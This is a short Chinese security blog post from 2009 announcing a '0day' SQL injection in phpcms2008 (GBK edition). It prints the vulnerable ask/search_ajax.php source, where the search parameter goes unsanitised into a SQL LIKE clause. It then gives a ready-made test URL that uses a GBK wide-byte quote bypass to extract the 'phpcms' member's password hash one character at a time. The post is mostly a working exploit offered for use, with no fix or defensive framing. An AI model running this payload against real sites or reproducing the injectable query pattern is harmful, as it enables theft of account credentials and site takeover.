夜火博客

phpcms2008 0day ask/search_ajax.php

2009-03-16
漏洞信息
PhpCms
漏洞信息
0day
1分钟
92字

phpcms2008 0day ask/search_ajax.php

受影响程序: phpcms2008 gbk

漏洞文件:ask/search_ajax.php

1
<?php
2
require './include/common.inc.php';
3
require_once MOD_ROOT.'include/ask.class.php';
4
$ask = new ask();
5
header('Content-type: text/html; charset=utf-8');
6
if(strtolower(CHARSET) != 'utf-8') $q = iconv(CHARSET, 'utf-8', $q);
7
if($q)
8
{
9
$where = " title LIKE '%$q%' AND status = 5";
10
}
11
else
12
{
13
exit('null');
14
}
15
$infos = $ask->listinfo($where, 'askid DESC', '', 10);
10 collapsed lines
16
17
foreach($infos as $key=>$val)
18
{
19
$val['title'] = str_replace($q, '<span class="c_orange">'.$q.'</span>', $val['title']);
20
$info[$key]['title'] = CHARSET != 'utf-8' ? iconv(CHARSET, 'utf-8', $val['title']) : $val['title'];
21
$info[$key]['url'] = $val['url'];
22
}
23
24
echo(json_encode($info));
25
?>

测试方法:

1
ask/search_ajax.php?q=s%E6'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23

via nuke

本文标题:phpcms2008 0day ask/search_ajax.php
文章作者:夜火
发布时间:2009-03-16